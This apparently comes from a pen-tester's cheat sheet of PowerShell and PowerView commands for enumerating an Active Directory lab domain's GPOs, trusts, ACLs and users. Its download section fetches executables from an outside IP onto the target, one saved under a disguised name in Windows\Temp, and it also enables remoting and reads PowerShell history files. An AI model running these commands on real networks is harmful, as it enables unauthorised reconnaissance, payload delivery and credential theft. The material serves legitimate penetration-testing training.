Introduction to Active Directory enumeration with PowerShell for pen-testers. Understand how to start enumerating a Domain Controller and escalate your privileges inside the network.

Group Policy (GPO) Enumeration

Get-NetGPO -ComputerName client-02.rfs.lab
Find-GPOComputerAdmin -ComputerName client-02.rfs.lab
Find-GPOLocation -UserName Rfs
Get-NetOU

Enumerate Domain Trusts

Get-NetDomainTrust
Get-NetForest
Get-NetForest -Forest rfs.lab
Get-NetForestDomain
Get-NetForestCatalog
Get-NetForestTrust

ACL Enumeration

Get-ObjectAcl -SamAccountName "users" -ResolveGUIDs
Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
Get-ObjectAcl -SamAccountName labuser -ResolveGUIDs -RightsFilter "ResetPassword"

Enumerating Users

Find-LocalAdminAccess
Invoke-EnumerateLocalAdmin
Invoke-UserHunter
Invoke-UserHunter -UserName "rfs"
Invoke-UserHunter -CheckAccess

Download Files

(New-Object Net.WebClient).DownloadFile("http://10.10.39.96:80/taskkill.exe","C:\Windows\Temp\rfs.exe")

Invoke-WebRequest

Invoke-WebRequest "http://10.10.39.96:80/rfs.exe" -OutFile "rfs.exe"

Windows Remote Management (WinRM)

Enable-PSRemoting -Force

PowerShell History

Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt